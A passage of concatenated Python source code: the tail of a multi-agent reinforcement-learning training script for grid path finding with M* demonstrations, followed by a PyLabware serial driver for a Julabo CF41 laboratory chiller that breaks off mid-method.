self.value_plus[:-1] advantages = good_discount(advantages,gamma) num_samples = min(EPISODE_SAMPLES,len(advantages)) sampleInd = np.sort(np.random.choice(advantages.shape[0], size=(num_samples,), replace=False)) # Update the global network using gradients from loss # Generate network statistics to periodically save rnn_state = self.local_AC.state_init feed_dict = { global_step:episode_count, self.local_AC.target_v:np.stack(discounted_rewards), self.local_AC.inputs:np.stack(observations), self.local_AC.goal_pos:np.stack(goals), self.local_AC.actions:actions, self.local_AC.train_valid:np.stack(valids), self.local_AC.advantages:advantages, self.local_AC.train_value:train_value, self.local_AC.target_blockings:blockings, self.local_AC.target_on_goals:on_goals, self.local_AC.state_in[0]:rnn_state[0], self.local_AC.state_in[1]:rnn_state[1] } v_l,p_l,valid_l,e_l,g_n,v_n,b_l,og_l,_ = sess.run([self.local_AC.value_loss, self.local_AC.policy_loss, self.local_AC.valid_loss, self.local_AC.entropy, self.local_AC.grad_norms, self.local_AC.var_norms, self.local_AC.blocking_loss, self.local_AC.on_goal_loss, self.local_AC.apply_grads], feed_dict=feed_dict) return v_l/len(rollout), p_l/len(rollout), valid_l/len(rollout), e_l/len(rollout), b_l/len(rollout), og_l/len(rollout), g_n, v_n def shouldRun(self, coord, episode_count): if TRAINING: return (not coord.should_stop()) else: return (episode_count < NUM_EXPS) def parse_path(self,path): '''needed function to take the path generated from M* and create the observations and actions for the agent path: the exact path ouput by M*, assuming the correct number of agents returns: the list of rollouts for the "episode": list of length num_agents with each sublist a list of tuples (observation[0],observation[1],optimal_action,reward)''' result=[[] for i in range(num_workers)] for t in range(len(path[:-1])): observations=[] move_queue=list(range(num_workers)) for agent in range(1,num_workers+1): observations.append(self.env._observe(agent)) steps=0 while len(move_queue)>0: steps+=1 i=move_queue.pop(0) o=observations[i] pos=path[t][i] newPos=path[t+1][i]#guaranteed to be in bounds by loop guard direction=(newPos[0]-pos[0],newPos[1]-pos[1]) a=self.env.world.getAction(direction) state, reward, done, nextActions, on_goal, blocking, valid_action=self.env._step((i+1,a)) if steps>num_workers**2: #if we have a very confusing situation where lots of agents move #in a circle (difficult to parse and also (mostly) impossible to learn) return None if not valid_action: #the tie must be broken here move_queue.append(i) continue result[i].append([o[0],o[1],a]) return result def work(self,max_episode_length,gamma,sess,coord,saver): global episode_count, swarm_reward, episode_rewards, episode_lengths, episode_mean_values, episode_invalid_ops,episode_wrong_blocking #, episode_invalid_goals total_steps, i_buf = 0, 0 episode_buffers, s1Values = [ [] for _ in range(NUM_BUFFERS) ], [ [] for _ in range(NUM_BUFFERS) ] with sess.as_default(), sess.graph.as_default(): while self.shouldRun(coord, episode_count): sess.run(self.pull_global) episode_buffer, episode_values = [], [] episode_reward = episode_step_count = episode_inv_count = 0 d = False # Initial state from the environment if self.agentID==1: self.env._reset(self.agentID) self.synchronize() # synchronize starting time of the threads validActions = self.env._listNextValidActions(self.agentID) s = self.env._observe(self.agentID) blocking = False p=self.env.world.getPos(self.agentID) on_goal = self.env.world.goals[p[0],p[1]]==self.agentID s = self.env._observe(self.agentID) rnn_state = self.local_AC.state_init RewardNb = 0 wrong_blocking = 0 wrong_on_goal=0 if self.agentID==1: global demon_probs demon_probs[self.metaAgentID]=np.random.rand() self.synchronize() # synchronize starting time of the threads # reset swarm_reward (for tensorboard) swarm_reward[self.metaAgentID] = 0 if episode_count<PRIMING_LENGTH or demon_probs[self.metaAgentID]<DEMONSTRATION_PROB: #for the first PRIMING_LENGTH episodes, or with a certain probability #don't train on the episode and instead observe a demonstration from M* if self.workerID==1 and episode_count%100==0: saver.save(sess, model_path+'/model-'+str(int(episode_count))+'.cptk') global rollouts rollouts[self.metaAgentID]=None if(self.agentID==1): world=self.env.getObstacleMap() start_positions=tuple(self.env.getPositions()) goals=tuple(self.env.getGoals()) try: """TODO: CBS instead of mstar""" mstar_path=cpp_mstar.find_path(world,start_positions,goals,2,5) rollouts[self.metaAgentID]=self.parse_path(mstar_path) except OutOfTimeError: #M* timed out print("timeout",episode_count) except NoSolutionError: print("nosol????",episode_count,start_positions) self.synchronize() if rollouts[self.metaAgentID] is not None and len(rollouts) == 2: i_l=self.train(rollouts[self.metaAgentID][self.agentID-1], sess, gamma, None,imitation=True) episode_count+=1./num_workers if self.agentID==1: summary = tf.Summary() summary.value.add(tag='Losses/Imitation loss', simple_value=i_l) global_summary.add_summary(summary, int(episode_count)) global_summary.flush() continue continue saveGIF = False if OUTPUT_GIFS and self.workerID == 1 and ((not TRAINING) or (episode_count >= self.nextGIF)): saveGIF = True self.nextGIF =episode_count + 64 GIF_episode = int(episode_count) episode_frames = [ self.env._render(mode='rgb_array',screen_height=900,screen_width=900) ] while (not self.env.finished): # Give me something! #Take an action using probabilities from policy network output. a_dist,v,rnn_state,pred_blocking,pred_on_goal = sess.run([self.local_AC.policy, self.local_AC.value, self.local_AC.state_out, self.local_AC.blocking, self.local_AC.on_goal], feed_dict={self.local_AC.inputs:[s[0]], self.local_AC.goal_pos:[s[1]], self.local_AC.state_in[0]:rnn_state[0], self.local_AC.state_in[1]:rnn_state[1]}) if(not (np.argmax(a_dist.flatten()) in validActions)): episode_inv_count += 1 train_valid = np.zeros(a_size) train_valid[validActions] = 1 valid_dist = np.array([a_dist[0,validActions]]) valid_dist /= np.sum(valid_dist) if TRAINING: if (pred_blocking.flatten()[0] < 0.5) == blocking: wrong_blocking += 1 if (pred_on_goal.flatten()[0] < 0.5) == on_goal: wrong_on_goal += 1 a = validActions[ np.random.choice(range(valid_dist.shape[1]),p=valid_dist.ravel()) ] train_val = 1. else: a = np.argmax(a_dist.flatten()) if a not in validActions or not GREEDY: a = validActions[ np.random.choice(range(valid_dist.shape[1]),p=valid_dist.ravel()) ] train_val = 1. _, r, _, _, on_goal,blocking,_ = self.env._step((self.agentID, a),episode=episode_count) self.synchronize() # synchronize threads # Get common observation for all agents after all individual actions have been performed s1 = self.env._observe(self.agentID) validActions = self.env._listNextValidActions(self.agentID, a,episode=episode_count) d = self.env.finished if saveGIF: episode_frames.append(self.env._render(mode='rgb_array',screen_width=900,screen_height=900)) episode_buffer.append([s[0],a,r,s1,d,v[0,0],train_valid,pred_on_goal,int(on_goal),pred_blocking,int(blocking),s[1],train_val]) episode_values.append(v[0,0]) episode_reward += r s = s1 total_steps += 1 episode_step_count += 1 if r>0: RewardNb += 1 if d == True: print('\n{} Goodbye World. We did it!'.format(episode_step_count), end='\n') # If the episode hasn't ended, but the experience buffer is full, then we # make an update step using that experience rollout. if TRAINING and (len(episode_buffer) % EXPERIENCE_BUFFER_SIZE == 0 or d): # Since we don't know what the true final return is, we "bootstrap" from our current value estimation. if len(episode_buffer) >= EXPERIENCE_BUFFER_SIZE: episode_buffers[i_buf] = episode_buffer[-EXPERIENCE_BUFFER_SIZE:] else: episode_buffers[i_buf] = episode_buffer[:] if d: s1Values[i_buf] = 0 else: s1Values[i_buf] = sess.run(self.local_AC.value, feed_dict={self.local_AC.inputs:np.array([s[0]]) ,self.local_AC.goal_pos:[s[1]] ,self.local_AC.state_in[0]:rnn_state[0] ,self.local_AC.state_in[1]:rnn_state[1]})[0,0] if (episode_count-EPISODE_START) < NUM_BUFFERS: i_rand = np.random.randint(i_buf+1) else: i_rand = np.random.randint(NUM_BUFFERS) tmp = np.array(episode_buffers[i_rand]) while tmp.shape[0] == 0: i_rand = np.random.randint(NUM_BUFFERS) tmp = np.array(episode_buffers[i_rand]) v_l,p_l,valid_l,e_l,b_l,og_l,g_n,v_n = self.train(episode_buffers[i_rand],sess,gamma,s1Values[i_rand]) i_buf = (i_buf + 1) % NUM_BUFFERS episode_buffers[i_buf] = [] self.synchronize() # synchronize threads sess.run(self.pull_global) if episode_step_count >= max_episode_length or d: break episode_lengths[self.metaAgentID].append(episode_step_count) episode_mean_values[self.metaAgentID].append(np.nanmean(episode_values)) episode_invalid_ops[self.metaAgentID].append(episode_inv_count) episode_wrong_blocking[self.metaAgentID].append(wrong_blocking) # Periodically save gifs of episodes, model parameters, and summary statistics. if episode_count % EXPERIENCE_BUFFER_SIZE == 0 and printQ: print(' ', end='\r') print('{} Episode terminated ({},{})'.format(episode_count, self.agentID, RewardNb), end='\r') swarm_reward[self.metaAgentID] += episode_reward self.synchronize() # synchronize threads episode_rewards[self.metaAgentID].append(swarm_reward[self.metaAgentID]) if not TRAINING: mutex.acquire() if episode_count < NUM_EXPS: plan_durations[episode_count] = episode_step_count if self.workerID == 1: episode_count += 1 print('({}) Thread {}: {} steps, {:.2f} reward ({} invalids).'.format(episode_count, self.workerID, episode_step_count, episode_reward, episode_inv_count)) GIF_episode = int(episode_count) mutex.release() else: episode_count+=1./num_workers if episode_count % SUMMARY_WINDOW == 0: if episode_count % 100 == 0: print ('Saving Model', end='\n') saver.save(sess, model_path+'/model-'+str(int(episode_count))+'.cptk') print ('Saved Model', end='\n') SL = SUMMARY_WINDOW * num_workers mean_reward = np.nanmean(episode_rewards[self.metaAgentID][-SL:]) mean_length = np.nanmean(episode_lengths[self.metaAgentID][-SL:]) mean_value = np.nanmean(episode_mean_values[self.metaAgentID][-SL:]) mean_invalid = np.nanmean(episode_invalid_ops[self.metaAgentID][-SL:]) mean_wrong_blocking = np.nanmean(episode_wrong_blocking[self.metaAgentID][-SL:]) current_learning_rate = sess.run(lr,feed_dict={global_step:episode_count}) summary = tf.Summary() summary.value.add(tag='Perf/Learning Rate',simple_value=current_learning_rate) summary.value.add(tag='Perf/Reward', simple_value=mean_reward) summary.value.add(tag='Perf/Length', simple_value=mean_length) summary.value.add(tag='Perf/Valid Rate', simple_value=(mean_length-mean_invalid)/mean_length) summary.value.add(tag='Perf/Blocking Prediction Accuracy', simple_value=(mean_length-mean_wrong_blocking)/mean_length) summary.value.add(tag='Losses/Value Loss', simple_value=v_l) summary.value.add(tag='Losses/Policy Loss', simple_value=p_l) summary.value.add(tag='Losses/Blocking Loss', simple_value=b_l) summary.value.add(tag='Losses/On Goal Loss', simple_value=og_l) summary.value.add(tag='Losses/Valid Loss', simple_value=valid_l) summary.value.add(tag='Losses/Grad Norm', simple_value=g_n) summary.value.add(tag='Losses/Var Norm', simple_value=v_n) global_summary.add_summary(summary, int(episode_count)) global_summary.flush() if printQ: print('{} Tensorboard updated ({})'.format(episode_count, self.workerID), end='\r') if saveGIF: # Dump episode frames for external gif generation (otherwise, makes the jupyter kernel crash) time_per_step = 0.1 images = np.array(episode_frames) if TRAINING: make_gif(images, '{}/episode_{:d}_{:d}_{:.1f}.gif'.format(gifs_path,GIF_episode,episode_step_count,swarm_reward[self.metaAgentID])) else: make_gif(images, '{}/episode_{:d}_{:d}.gif'.format(gifs_path,GIF_episode,episode_step_count), duration=len(images)*time_per_step,true_image=True,salience=False) if SAVE_EPISODE_BUFFER: with open('gifs3D/episode_{}.dat'.format(GIF_episode), 'wb') as file: pickle.dump(episode_buffer, file) # Learning parameters max_episode_length = 256 episode_count = 0 EPISODE_START = episode_count gamma = .95 # discount rate for advantage estimation and reward discounting #moved network parameters to ACNet.py EXPERIENCE_BUFFER_SIZE = 128 GRID_SIZE = 5 #the size of the FOV grid to apply to each agent ENVIRONMENT_SIZE = (5,5)#the total size of the environment (length of one side) OBSTACLE_DENSITY = (0,0.000001) #range of densities DIAG_MVMT = False # Diagonal movements allowed? a_size = 5 + int(DIAG_MVMT)*4 SUMMARY_WINDOW = 10 NUM_META_AGENTS = 3 NUM_THREADS = 1 #int(multiprocessing.cpu_count() / (2 * NUM_META_AGENTS)) NUM_BUFFERS = 1 # NO EXPERIENCE REPLAY int(NUM_THREADS / 2) EPISODE_SAMPLES = EXPERIENCE_BUFFER_SIZE # 64 LR_Q = 2.e-5 #8.e-5 / NUM_THREADS # default: 1e-5 ADAPT_LR = True ADAPT_COEFF = 5.e-5 #the coefficient A in LR_Q/sqrt(A*steps+1) for calculating LR load_model = False RESET_TRAINER = False model_path = 'model_primal' gifs_path = 'gifs_primal' train_path = 'train_primal' GLOBAL_NET_SCOPE = 'global' #Imitation options PRIMING_LENGTH = 0 # number of episodes at the beginning to train only on demonstrations DEMONSTRATION_PROB = 0.5 # probability of training on a demonstration per episode # Simulation options FULL_HELP = False OUTPUT_GIFS = True SAVE_EPISODE_BUFFER = False # Testing TRAINING = True GREEDY = False NUM_EXPS = 100 MODEL_NUMBER = 313000 # Shared arrays for tensorboard episode_rewards = [ [] for _ in range(NUM_META_AGENTS) ] episode_lengths = [ [] for _ in range(NUM_META_AGENTS) ] episode_mean_values = [ [] for _ in range(NUM_META_AGENTS) ] episode_invalid_ops = [ [] for _ in range(NUM_META_AGENTS) ] episode_wrong_blocking = [ [] for _ in range(NUM_META_AGENTS) ] rollouts = [ None for _ in range(NUM_META_AGENTS)] demon_probs=[np.random.rand() for _ in range(NUM_META_AGENTS)] # episode_steps_on_goal = [ [] for _ in range(NUM_META_AGENTS) ] printQ = False # (for headless) swarm_reward = [0]*NUM_META_AGENTS tf.reset_default_graph() print("Hello World") if not os.path.exists(model_path): os.makedirs(model_path) config = tf.ConfigProto(allow_soft_placement = True) config.gpu_options.allow_growth=True if not TRAINING: plan_durations = np.array([0 for _ in range(NUM_EXPS)]) mutex = threading.Lock() gifs_path += '_tests' if SAVE_EPISODE_BUFFER and not os.path.exists('gifs3D'): os.makedirs('gifs3D') #Create a directory to save episode playback gifs to if not os.path.exists(gifs_path): os.makedirs(gifs_path) with tf.device("/gpu:0"): master_network = ACNet(GLOBAL_NET_SCOPE,a_size,None,False,GRID_SIZE,GLOBAL_NET_SCOPE) # Generate global network global_step = tf.placeholder(tf.float32) if ADAPT_LR: #computes LR_Q/sqrt(ADAPT_COEFF*steps+1) #we need the +1 so that lr at step 0 is defined lr=tf.divide(tf.constant(LR_Q),tf.sqrt(tf.add(1.,tf.multiply(tf.constant(ADAPT_COEFF),global_step)))) else: lr=tf.constant(LR_Q) trainer = tf.contrib.opt.NadamOptimizer(learning_rate=lr, use_locking=True) if TRAINING: num_workers = NUM_THREADS # Set workers # = # of available CPU threads else: num_workers = NUM_THREADS NUM_META_AGENTS = 1 gameEnvs, workers, groupLocks = [], [], [] n=1#counter of total number of agents (for naming) for ma in range(NUM_META_AGENTS): num_agents=NUM_THREADS gameEnv = mapf_gym.MAPFEnv(num_agents=num_agents, DIAGONAL_MOVEMENT=DIAG_MVMT, SIZE=ENVIRONMENT_SIZE, observation_size=GRID_SIZE,PROB=OBSTACLE_DENSITY, FULL_HELP=FULL_HELP) gameEnvs.append(gameEnv) # Create groupLock workerNames = ["worker_"+str(i) for i in range(n,n+num_workers)] groupLock = GroupLock.GroupLock([workerNames,workerNames]) groupLocks.append(groupLock) # Create worker classes workersTmp = [] for i in range(ma*num_workers+1,(ma+1)*num_workers+1): workersTmp.append(Worker(gameEnv,ma,n,a_size,groupLock)) n+=1 workers.append(workersTmp) global_summary = tf.summary.FileWriter(train_path) saver = tf.train.Saver(max_to_keep=2) with tf.Session(config=config) as sess: sess.run(tf.global_variables_initializer()) coord = tf.train.Coordinator() if load_model == True: print ('Loading Model...') if not TRAINING: with open(model_path+'/checkpoint', 'w') as file: file.write('model_checkpoint_path: "model-{}.cptk"'.format(MODEL_NUMBER)) file.close() ckpt = tf.train.get_checkpoint_state(model_path) p=ckpt.model_checkpoint_path p=p[p.find('-')+1:] p=p[:p.find('.')] episode_count=int(p) saver.restore(sess,ckpt.model_checkpoint_path) print("episode_count set to ",episode_count) if RESET_TRAINER: trainer = tf.contrib.opt.NadamOptimizer(learning_rate=lr, use_locking=True) # This is where the asynchronous magic happens. # Start the "work" process for each worker in a separate thread. worker_threads = [] for ma in range(NUM_META_AGENTS): for worker in workers[ma]: groupLocks[ma].acquire(0,worker.name) # synchronize starting time of the threads worker_work = lambda: worker.work(max_episode_length,gamma,sess,coord,saver) print("Starting worker " + str(worker.workerID)) t = threading.Thread(target=(worker_work)) t.start() worker_threads.append(t) coord.join(worker_threads) if not TRAINING: print([np.mean(plan_durations), np.sqrt(np.var(plan_durations)), np.mean(np.asarray(plan_durations < max_episode_length, dtype=float))])
julabo_cf41.py
"""PyLabware driver for Julabo CF41 chiller.""" import threading from time import sleep from typing import Optional, Union import serial # Core imports from .. import parsers as parser from ..controllers import AbstractTemperatureController, in_simulation_device_returns from ..exceptions import (PLConnectionError, PLDeviceCommandError, PLDeviceInternalError, PLDeviceReplyError) from ..models import LabDeviceCommands, ConnectionParameters class CF41ChillerCommands(LabDeviceCommands): """Collection of command definitions for CF41 chiller. """ # ################### Configuration constants ############################# DEFAULT_NAME = "JULABO CRYOCOMPACT CF41" # Selected setpoint to use SETPOINT_MODES = {0: "SP1", 1: "SP2", 2: "SP3"} # Self-tuning modes SELFTUNE_MODES = {0: "SELFTUNE_OFF", 1: "SELFTUNE_ONCE", 2: "SELFTUNE_ALWAYS"} # External programmer input modes. 0 - voltage 0..10V; 1 - current 0..20mA EXTPROG_MODES = {0: "EXT_VOLTAGE", 1: "EXT_CURRENT"} # Temperature regulation mode. 0 - internal; 1 - external Pt100 REGULATION_MODES = {0: "INTERNAL", 1: "EXTERNAL"} # Control dynamics modes CONTROL_DYNAMCIS_MODES = {0: "APERIODIC", 1: "STANDARD"} # Pump speed modes PUMP_SPEED_MODES = [1, 2, 3, 4] STATUSES = { "00": "STOPPED", "02": "STOPPED", "01": "STARTED", "03": "STARTED" } # Non critical errors. User has to be notified, but device can keep operating. WARNINGS = { "-10": "Entered value too small!", "-11": "Entered value too large!", "-15": "External control selected, but Pt100 sensor not connected.", "-20": "Check air cooled condenser.", "-21": "Compressor stage 1 does not work.", "-26": "Stand-by plug is missing.", "-33": "Safety temperature sensor short-circuited or open!", "-38": "External Pt100 sensor error!", "-40": "Coolant level low" } # Critical errors. Device operation is not possible until the error is cleared. ERRORS = { "-01": "Coolant level critically low!", "-03": "Coolant temperature too high!", "-04": "Coolant temperature too low!", "-05": "Working temperature sensor short-circuited or open!", "-06": "Temperature difference between working and safety temperature is above 35°C!", "-07": "Internal I2C bus error!", "-08": "Invalid command!", "-09": "Invalid command in current operating mode!", "-12": "Internal ADC error!", "-13": "Set temperature value exceeds safety limits!", "-14": "Excess temperature protection alarm", } # ################### Control commands ################################### # Get software version GET_VERSION = {"name": "VERSION", "reply": {"type": str, "parser": parser.slicer, "args": [-3]}} # Get device name GET_NAME = {"name": "VERSION", "reply": {"type": str, "parser": parser.slicer, "args": [0, 23]}} # Get status/error message GET_STATUS = {"name": "STATUS", "reply": {"type": str, "parser": parser.slicer, "args": [0, 2]}} # Get/set working temperature - setpoint 1 GET_TEMP_SP1 = {"name": "IN_SP_00", "reply": {"type": float}} # Most of the chillers have H5 cooling fluid which has recommended temperature -40..110 ºC SET_TEMP_SP1 = {"name": "OUT_SP_00", "type": float, "check": {"min": -40, "max": 110}} # Get/set working temperature - setpoint 2 GET_TEMP_SP2 = {"name": "IN_SP_01", "reply": {"type": float}} SET_TEMP_SP2 = {"name": "OUT_SP_01", "type": float, "check": {"min": -40, "max": 110}} # Get/set working temperature - setpoint 3 GET_TEMP_SP3 = {"name": "IN_SP_02", "reply": {"type": float}} SET_TEMP_SP3 = {"name": "OUT_SP_02", "type": float, "check": {"min": -40, "max": 110}} # Get/set pump speed mode GET_PUMP_SPEED = {"name": "IN_SP_07", "reply": {"type": int}} SET_PUMP_SPEED = {"name": "OUT_SP_07", "type": int, "check": {"values": PUMP_SPEED_MODES}} # Get/set maximum cooling power GET_MAX_COOL_PWR = {"name": "IN_HIL_00", "reply": {"type": int}} SET_MAX_COOL_PWR = {"name": "OUT_HIL_00", "type": int, "check": {"min": -100, "max": 0}} # Get/set maximum heating power GET_MAX_HEAT_PWR = {"name": "IN_HIL_01", "reply": {"type": int}} SET_MAX_HEAT_PWR = {"name": "OUT_HIL_01", "type": int, "check": {"min": 10, "max": 100}} # Start the chiller START_CHILLER = {"name": "OUT_MODE_05 1"} # Stop the chiller STOP_CHILLER = {"name": "OUT_MODE_05 0"} # Get chiller state GET_CHILLER_STATE = {"name": "IN_MODE_05", "reply": {"type": int}} # Get actual bath temperature GET_TEMP_INT = {"name": "IN_PV_00", "reply": {"type": float}} # Get heating power, % GET_HEAT_PWR = {"name": "IN_PV_01", "reply": {"type": float}} # Get temperature from external Pt100 sensor GET_TEMP_EXT = {"name": "IN_PV_02", "reply": {"type": float}} # Get safety sensor temperature GET_TEMP_SAFE = {"name": "IN_PV_03", "reply": {"type": float}} # Get safety temperature setpoint GET_TEMP_SAFE_SET = {"name": "IN_PV_04", "reply": {"type": float}} # Get/set high temperature warning limit GET_TEMP_LIM_HI = {"name": "IN_SP_03", "reply": {"type": float}} # Room temperature to maximum temp the chiller can reach SET_TEMP_LIM_HI = {"name": "OUT_SP_03", "type": float, "check": {"min": 20, "max": 190}} # Get/set low temperature warning limit GET_TEMP_LIM_LO = {"name": "IN_SP_04", "reply": {"type": float}} # Room temperature to minimum temperature the chiller can reach SET_TEMP_LIM_LO = {"name": "OUT_SP_04", "type": float, "check": {"min": -40, "max": 19}} # Get value from external flowrate sensor GET_EXT_FLOWRATE = {"name": "IN_SP_08", "reply": {"type": float}} # Get temperature difference between working and safety sensor GET_TEMP_DELTA = {"name": "IN_PAR_00", "reply": {"type": float}} # Get time constant for external bath GET_BATH_TE_EXT = {"name": "IN_PAR_01", "reply": {"type": float}} # Get internal slope GET_SI = {"name": "IN_PAR_02", "reply": {"type": float}} # Time constant for internal bath GET_BATH_TE_INT = {"name": "IN_PAR_03", "reply": {"type": float}} # Get bath temperature band limit GET_BATH_BAND_LIMIT = {"name": "IN_PAR_04", "reply": {"type": float}} # Get self-tuning mode. 0 - off; 1 - once; 2 - always GET_SELFTUNE_MODE = {"name": "IN_MODE_02", "reply": {"type": int}} # Get type of ext programmer input. GET_EXTPROG_MODE = {"name": "IN_MODE_03", "reply": {"type": int}} # Get/set temperature control mode. 0 - internal; 1 - external. GET_TEMP_REG_MODE = {"name": "IN_MODE_04", "reply": {"type": int}} # Set temperature regulation mode SET_TEMP_REG_MODE = {"name": "OUT_MODE_04", "type": int, "check": {"values": REGULATION_MODES}} # Get control dynamics mode. 0 - aperiodic; 1 - standard GET_DYN_MODE = {"name": "IN_MODE_08", "reply": {"type": int}} # ################### Configuration commands ############################# # Get/set temperature setpoint to use (SP1..SP3) SET_TEMP_SP = {"name": "OUT_MODE_01", "type": int, "check": {"values": SETPOINT_MODES}} GET_TEMP_SP = {"name": "IN_MODE_01", "reply": {"type": int}} # Set self-tune mode SET_SELFTUNE_MODE = {"name": "OUT_MODE_02", "type": int, "check": {"values": SELFTUNE_MODES}} # Set external programmer mode SET_EXTPROG_MODE = {"name": "OUT_MODE_03", "type": int, "check": {"values": EXTPROG_MODES}} # Set manipulated variable for the heater via serial interface SET_HEATER_VALUE = {"name": "OUT_SP_06", "type": int, "check": {"min": -100, "max": 100}} # Set cospeed for external control SET_COSPEED_EXT = {"name": "OUT_PAR_04", "type": float, "check": {"min": 0, "max": 5}} # Set control dynamics mode SET_CONTROL_MODE = {"name": "OUT_MODE_08", "type": int, "check": {"values": CONTROL_DYNAMCIS_MODES}} # Get setpoint temperature of external programmer GET_TEMP_EXTPROG = {"name": "IN_SP_05", "reply": {"type": float}} # Get temperature indication: 0-°C, 1-°F GET_TEMP_UNITS = {"name": "IN_SP_06", "reply": {"type": float}} # Get pk/ph0 factor (ratio between max cooling and max heating capacity) GET_PKPH0 = {"name": "IN_PAR_05", "reply": {"type": float}} # Get/set Xp control parameter of the internal controller GET_XP_INT = {"name": "IN_PAR_06", "reply": {"type": float}} SET_XP_INT = {"name": "OUT_PAR_06", "type": float, "check": {"min": 0.1, "max": 99.9}} # Get/set Tn control parameter of the internal controller GET_TN_INT = {"name": "IN_PAR_07", "reply": {"type": int}} SET_TN_INT = {"name": "OUT_PAR_07", "type": int, "check": {"min": 3, "max": 9999}} # Get/set Tv control parameter of the internal controller GET_TV_INT = {"name": "IN_PAR_08", "reply": {"type": int}} SET_TV_INT = {"name": "OUT_PAR_08", "type": int, "check": {"min": 0, "max": 999}} # Get/set Xp control parameter of the cascaded controller GET_XP_CAS = {"name": "IN_PAR_09", "reply": {"type": float}} SET_XP_CAS = {"name": "OUT_PAR_09", "type": float, "check": {"min": 0.1, "max": 99.9}} # Get/set proportional coefficient of the cascaded controller GET_PROP_CAS = {"name": "IN_PAR_10", "reply": {"type": float}} SET_PROP_CAS = {"name": "OUT_PAR_10", "type": float, "check": {"min": 1, "max": 99.9}} # Get/set Tn control parameter of the cascaded controller GET_TN_CAS = {"name": "IN_PAR_11", "reply": {"type": int}} SET_TN_CAS = {"name": "OUT_PAR_11", "type": int, "check": {"min": 3, "max": 9999}} # Get/set Tn control parameter of the cascaded controller GET_TV_CAS = {"name": "IN_PAR_12", "reply": {"type": int}} SET_TV_CAS = {"name": "OUT_PAR_12", "type": int, "check": {"min": 0, "max": 999}} # Get/set adjusted maximum internal temperature for the cascaded controller GET_TEMP_CAS_MAX = {"name": "IN_PAR_13", "reply": {"type": float}} SET_TEMP_CAS_MAX = {"name": "OUT_PAR_13", "type": float} # Get/set adjusted minimum internal temperature for the cascaded controller GET_TEMP_CAS_MIN = {"name": "IN_PAR_14", "reply": {"type": float}} SET_TEMP_CAS_MIN = {"name": "OUT_PAR_14", "type": float} # Get/set upper band limit GET_BAND_LIM_HI = {"name": "IN_PAR_15", "reply": {"type": int}} SET_BAND_LIM_HI = {"name": "OUT_PAR_15", "type": int, "check": {"min": 0, "max": 200}} # Get/set lower band limit GET_BAND_LIM_LO = {"name": "IN_PAR_16", "reply": {"type": int}} SET_BAND_LIM_LO = {"name": "OUT_PAR_16", "type": int, "check": {"min": 0, "max": 200}} class CF41Chiller(AbstractTemperatureController): """ This provides a Python class for the Julabo CF41 chiller based on the the original operation manual 1.951.4871-V3 11/15 26.11.15 """ def __init__(self, device_name: str, connection_mode: str, address: Optional[str], port: Union[str, int]): """Default constructor """ self.cmd = CF41ChillerCommands # Serial connection settings - p.71 of the manual connection_parameters: ConnectionParameters = {} connection_parameters["port"] = port connection_parameters["address"] = address connection_parameters["baudrate"] = 9600 connection_parameters["bytesize"] = serial.SEVENBITS connection_parameters["parity"] = serial.PARITY_EVEN connection_parameters["rtscts"] = True connection_parameters["command_delay"] = 0.3 # Protocol settings self.command_terminator = "\r\n" self.reply_terminator = "\r\n" self.args_delimiter = " " super().__init__(device_name, connection_mode, connection_parameters) def initialize_device(self): """This chiller doesn't have initialization method. """ @in_simulation_device_returns("00") # Stopped, no error def get_status(self) -> str: """Gets chiller status. """ return self.send(self.cmd.GET_STATUS) def check_errors(self): """Checks device for errors. """ status = self.get_status() # All OK if status in self.cmd.STATUSES: self.logger.debug("get_status()::status: <%s>", self.cmd.STATUSES[status]) return # Warning if status in self.cmd.WARNINGS: self.logger.warning("Warning! %s", self.cmd.WARNINGS[status]) return # Critical error if status in self.cmd.ERRORS: self.logger.error("Critical error: %s", self.cmd.ERRORS[status]) raise PLDeviceInternalError(self.cmd.ERRORS[status]) errmsg = f"Unknown status {status} received from device!" self.logger.error(errmsg) raise PLDeviceReplyError(errmsg) def clear_errors(self): """Not yet implemented. #TODO """ raise NotImplementedError @in_simulation_device_returns(CF41ChillerCommands.DEFAULT_NAME) def is_connected(self) -> bool: """Checks if teh chiller is connected. """ try: name = self.send(self.cmd.GET_NAME) except PLConnectionError: return False return name == self.cmd.DEFAULT_NAME @in_simulation_device_returns(0) def is_idle(self) -> bool: """ Returns true if the chiller is off: pump and temperature control """ if not self.is_connected(): return False status = self.send(self.cmd.GET_CHILLER_STATE) return status == 0 def start_temperature_regulation(self): """Starts the chiller """ self.send(self.cmd.START_CHILLER) def stop_temperature_regulation(self): """Stops the chiller """ self.send(self.cmd.STOP_CHILLER) def get_regulation_mode(self) -> int: """Gets current temperature regulation mdoe. """ return self.send(self.cmd.GET_TEMP_REG_MODE) def set_regulation_mode(self, mode: int): """Sets chiller temperature regulation mode. """ # Check if we got valid mode if mode not in self.cmd.REGULATION_MODES: raise PLDeviceCommandError("Invalid regulation mode provided!") self.send(self.cmd.SET_TEMP_REG_MODE, mode) @in_simulation_device_returns("{$args[1]}") def set_temperature(self, temperature: float, sensor: int = 0): """Sets the target temperature of the chiller. Args: temperature (float): Temperature setpoint in °C. sensor (int): Specify which temperature probe the setpoint applies to. The Julabo CF41 chiller has one common setpoint temperature shared by the external and internal probe. Thus, the sensor variable has no effect here. """ # Check which SP is currently active setpoint_active = self.get_active_setpoint() # Choose the setpoint if setpoint_active == 0: self.send(self.cmd.SET_TEMP_SP1, temperature) elif setpoint_active == 1: self.send(self.cmd.SET_TEMP_SP2, temperature) elif setpoint_active == 2: self.send(self.cmd.SET_TEMP_SP3, temperature) else: raise PLDeviceCommandError(f"Invalid active SP <{setpoint_active}> received from the device!") @in_simulation_device_returns(0) def get_active_setpoint(self) -> int: """ Gets currently active temperature setpoint. """ return self.send(self.cmd.GET_TEMP_SP) def get_temperature(self, sensor: int = 0) -> float: """Retrieves the current temperature of the chiller. This can be the internal or external temperature, depending in what mode the chiller is currently operating. Args: sensor (int): Specify which temperature probe the setpoint applies to. """ # First, get regulation mde from the chiller mode = self.get_regulation_mode() if mode is None: # The chiller returned an invalid mode. raise PLDeviceReplyError(f"Received invalid mode '{mode}' from the chiller " f"'{self.device_name}'. Valid modes are '0' (internal " "regulation mode) and '1' (external regulation mode).") # Invalid sensor requested if sensor not in self.cmd.REGULATION_MODES.keys(): raise PLDeviceCommandError(f"Invalid sensor number {sensor} provided!" f"Allowed values are {self.cmd.REGULATION_MODES}") # Check if the sensor requested matches the regulation modes (0 - internal; 1 - external) # FIXME # If external probe is not connected, chiller returns "---.--" # which would throw an exception from parse_reply() when requesting external sensor reading if sensor != mode: self.logger.warning("Chiller currently operates in {mode} regulation mode, " "but the reading from sensor {sensor} ({self.cmd.REGULATION_MODES[sensor]}) was requested!") # Internal sensor 